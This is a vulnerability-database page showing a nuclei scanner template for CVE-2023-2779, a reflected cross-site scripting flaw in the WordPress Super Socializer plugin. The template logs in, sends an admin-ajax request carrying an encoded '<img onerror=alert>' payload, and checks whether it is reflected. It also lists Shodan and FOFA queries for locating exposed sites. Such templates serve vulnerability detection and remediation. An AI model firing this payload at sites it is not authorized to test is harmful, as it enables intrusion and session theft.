Lucene search
K

Super Socializer < 7.13.52 - Cross-Site Scripting

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 27 Views

Super Socializer < 7.13.52 - Reflected Cross-Site Scripting allows attackers to execute arbitrary cod

Related
Refs
Code
id: CVE-2023-2779

info:
  name: Super Socializer < 7.13.52 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
  impact: |
    Unauthenticated attackers can inject malicious JavaScript to steal high-privilege user session cookies including administrator credentials.
  remediation: Fixed in version 7.13.52
  reference:
    - https://wpscan.com/vulnerability/fe9b7696-3b0e-42e2-9dbc-55167605f5c5
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2779
    - https://wordpress.org/plugins/super-socializer/
    - https://github.com/40826d/advisories
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-2779
    cwe-id: CWE-79
    epss-score: 0.05991
    epss-percentile: 0.92422
    cpe: cpe:2.3:a:heator:social_share\,_social_login_and_social_comments:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: heator
    product: social_share\,_social_login_and_social_comments
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/super-socializer/
    fofa-query: body=/wp-content/plugins/super-socializer/
    publicwww-query: "/wp-content/plugins/super-socializer/"
  tags: cve,cve2023,wpscan,xss,wp,wp-plugin,wordpress,authenticated,super-socializer,heator,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://oast.pro HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(header_2, "text/html")'
          - 'contains(body_2, "<img src=x onerror=alert(document.domain)>") && contains(body_2, "facebook_urls")'
        condition: and
# digest: 4b0a00483046022100d2420e7e5bbd327a541e9e1b1a62d079458518a7fc5582add4ed98912b492620022100e6ed391fbb97dc7b780961fdcc1b62bb06a69ded790bf349f01b1a721a68287d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 3.16.1
EPSS0.05991
SSVC
27